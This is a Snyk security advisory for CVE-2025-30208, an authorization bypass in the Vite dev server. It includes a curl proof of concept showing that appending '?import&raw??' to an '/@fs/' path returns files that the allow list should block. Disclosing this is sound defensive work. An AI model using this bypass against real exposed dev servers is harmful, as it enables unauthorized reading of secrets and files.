Incorrect Authorization Affecting org.webjars.npm:vite package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JAVA-ORGWEBJARSNPM-9512411
- published25 Mar 2025
- disclosed24 Mar 2025
- creditEzzer17
Introduced: 24 Mar 2025
NewCVE-2025-30208 (opens in a new tab)How to fix?
A fix was pushed into the master branch but not yet published.
Overview
org.webjars.npm:vite is a Native-ESM powered web dev build tool
Affected versions of this package are vulnerable to Incorrect Authorization due to missing checks in transformMiddleware() which ignore certain query parameters. An attacker can access unauthorized files by including a ?raw?? or ?import&raw?? URL parameter. The allow list used by server.fs.deny() is not checked when handling these queries and the file contents are returned.
Note: The dev server is configured by default to be inaccessible. This is only exploitable if the dev server is exposed to the network with either the --host command line option or server.host config option.
PoC
$ echo "top secret content" > /tmp/secret.txt
# expected behavior
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
<body>
<h1>403 Restricted</h1>
<p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"